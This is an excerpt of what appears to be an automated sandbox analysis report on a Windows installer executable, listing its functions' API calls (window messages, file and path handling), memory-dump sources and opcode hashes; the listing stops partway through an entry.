                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000FC,0040551A), ref: 00404FAA
                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FBE
                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FD0
                                                                                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404FE6
                                                                                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FF2
                                                                                                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405004
                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00405007
                                                                                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405032
                                                                                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040503E
                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D9
                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405109
                                                                                                                                                                                            • Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,00000001,00404300), ref: 004044E3
                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040511D
                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0040514B
                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405159
                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00405169
                                                                                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405264
                                                                                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C9
                                                                                                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052DE
                                                                                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405302
                                                                                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405322
                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00405337
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00405347
                                                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053C0
                                                                                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00405469
                                                                                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405478
                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004054A3
                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 004054F1
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 004054FC
                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00405503
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                          • String ID: $M$N
                                                                                                                                                                                          • API String ID: 2564846305-813528018
                                                                                                                                                                                          • Opcode ID: 963d0e2195837636cb6f5b073c234fd9fc9862b141633064f8114fc5dd327728
                                                                                                                                                                                          • Instruction ID: 467e9106b9ab4b1e9b2d04e68362d71007c986f05034cc4a0cb7dcf353c6e141
                                                                                                                                                                                          • Opcode Fuzzy Hash: 963d0e2195837636cb6f5b073c234fd9fc9862b141633064f8114fc5dd327728
                                                                                                                                                                                          • Instruction Fuzzy Hash: 16029B70A00609EFDB20DF95DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42CF58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046FD
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404711
                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040472E
                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 0040473F
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040474D
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040475B
                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00404760
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040476D
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404782
                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 004047DB
                                                                                                                                                                                          • SendMessageW.USER32(00000000), ref: 004047E2
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040480D
                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404850
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 0040485E
                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 00404861
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040487A
                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 0040487D
                                                                                                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048AC
                                                                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048BE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                          • String ID: : Completed$N$fh
                                                                                                                                                                                          • API String ID: 3103080414-3646902880
                                                                                                                                                                                          • Opcode ID: d465d3d5382bb59059b47d3503e7a252332af71f120e52871dcbc052c6d80ab7
                                                                                                                                                                                          • Instruction ID: fa786ba7610ecb1ae21ae2169d8ef808fc0b2da043ab7544d4c43deaa2774949
                                                                                                                                                                                          • Opcode Fuzzy Hash: d465d3d5382bb59059b47d3503e7a252332af71f120e52871dcbc052c6d80ab7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F61B3B1A00209BFDB10AF64DD85A6A7B79FB84354F00843AFB05B61D0D7B9AD61CF58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                          • DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                          • String ID: F
                                                                                                                                                                                          • API String ID: 941294808-1304234792
                                                                                                                                                                                          • Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                                                                                                                                          • Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
                                                                                                                                                                                          • Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                                                                                                                                          • Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406302,?,?), ref: 004061A2
                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061AB
                                                                                                                                                                                            • Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
                                                                                                                                                                                            • Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8
                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061C8
                                                                                                                                                                                          • wsprintfA.USER32 ref: 004061E6
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406221
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406230
                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406268
                                                                                                                                                                                          • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062BE
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 004062CF
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062D6
                                                                                                                                                                                            • Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,00437800,80000000,00000003), ref: 00406015
                                                                                                                                                                                            • Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406037
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                          • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                          • API String ID: 2171350718-461813615
                                                                                                                                                                                          • Opcode ID: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                                                                                                                                                          • Instruction ID: d8f03b5b48010a369f687ed07a259b5d04d98e8e290d987932ab0f9f84d7b5e4
                                                                                                                                                                                          • Opcode Fuzzy Hash: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                                                                                                                                                          • Instruction Fuzzy Hash: 89313230201325BFD6207B659D48F2B3A6CDF41714F12007EBA02F62C2EA7D98218ABD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 00404524
                                                                                                                                                                                          • GetSysColor.USER32(00000000), ref: 00404562
                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 0040456E
                                                                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 0040457A
                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 0040458D
                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 0040459D
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004045B7
                                                                                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 004045C1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                                                                          • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                                                                          • Instruction ID: 524417ed32742d4b72cd17798d780815826fd18a7bcb7bb0f1ed1fdd1052d135
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                                                                          • Instruction Fuzzy Hash: B22135B1500705AFCB319F78DD08B577BF5AF81714B048A2DEA96A26E0D738D944CB54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                                                                                                                                                                            • Part of subcall function 004060F2: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406108
                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                          • String ID: 9
                                                                                                                                                                                          • API String ID: 163830602-2366072709
                                                                                                                                                                                          • Opcode ID: 0fe20a848d4a285c173513a47146d0bdd1f0b43cc80ef0beb9e6d9777ffbd6ad
                                                                                                                                                                                          • Instruction ID: 4938fc2aff7960a3a7fedf371d3c64c497049ea43b58312dd80c80f6ae9549af
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0fe20a848d4a285c173513a47146d0bdd1f0b43cc80ef0beb9e6d9777ffbd6ad
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5051FB75D0421AABDF249FD4CA84AAEBB79FF04344F10817BE901B62D0D7B49D828B58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00434000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
                                                                                                                                                                                          • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
                                                                                                                                                                                          • CharNextW.USER32(?,00434000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
                                                                                                                                                                                          • CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                                                                          • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                          • API String ID: 589700163-4010320282
                                                                                                                                                                                          • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                                                                                                                          • Instruction ID: 2d41fa7b6770246c30beeceb47eb68b435a53440eacd13368e2f30b8c56315d6
                                                                                                                                                                                          • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                                                                                                                          • Instruction Fuzzy Hash: A511935680121296DB303B14CC44ABB66E8AF54794F52C03FE999732C1E77C5C9296BD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E76
                                                                                                                                                                                          • GetMessagePos.USER32 ref: 00404E7E
                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404E98
                                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EAA
                                                                                                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404ED0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                                                                          • String ID: f
                                                                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                                                                          • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                                                                          • Instruction ID: cfceae8db68972c520d490933057d7cb8d8acba3ea2256e028311c612775fba1
